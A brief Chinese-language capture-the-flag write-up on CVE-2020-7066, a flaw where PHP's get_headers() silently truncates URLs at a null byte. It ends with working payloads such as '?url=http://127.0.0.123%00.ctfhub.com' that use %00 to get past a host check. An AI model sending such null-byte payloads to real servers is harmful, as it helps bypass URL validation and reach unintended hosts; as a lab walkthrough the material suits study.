在線googlecve-2020-7066
在低於7.2.29的PHP版本7.2.x,低於7.3.16的7.3.x和低於7.4.4的7.4.x中,將
get_headers()與用戶提供的URL一起使用時,如果URL包含零(\ 0)字符,則 URL將被靜默地截斷。 這可能會導致某些軟件對get_headers()的目標做出錯誤的假設,並可能將某些信息發送到錯誤的服務器。
貌似是get_headers()函數可以被%00截斷
測試payload:?url=http://127.0.0.1%00.ctfhub.com
按照提示在Host的最後八位使用123
?url=http://127.0.0.123%00.ctfhub.com
